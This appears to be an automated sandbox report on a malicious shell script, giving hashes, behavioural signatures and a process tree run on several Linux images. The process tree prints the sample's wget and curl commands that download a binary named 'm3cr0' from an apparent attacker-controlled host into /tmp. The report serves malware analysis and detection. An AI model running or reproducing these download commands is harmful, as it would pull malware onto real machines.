Analysis
-
max time kernel
149s -
max time network
3s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
23-10-2024 01:00
Static task
static1
Behavioral task
behavioral1
Sample
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
-
Size
3KB
-
MD5
cf70ee36f1e9247f2146e4981924d4f4
-
SHA1
7eabae4200118c4e89979658db6e4d905fe3dae9
-
SHA256
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c
-
SHA512
60f6bdf8813ee328f747b722e8d8abb8ecd91836a96de7e877217c6794d4dcef56130f3f833f748637b0a7b81bac94ea7e3d9cb3dfff0a2060eab34c20070bd0
Malware Config
Signatures
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curldescription ioc process File opened for reading /proc/cpuinfo curl -
Processes:
curldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetdescription ioc process File opened for modification /tmp/m3cr0 wget
Processes
-
/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh1⤵PID:660
-
/usr/bin/wgetwget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr02⤵
- Writes file to tmp directory
PID:662
-
-
/usr/bin/curlcurl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr02⤵
- Checks CPU configuration
- Reads runtime system information
PID:672
-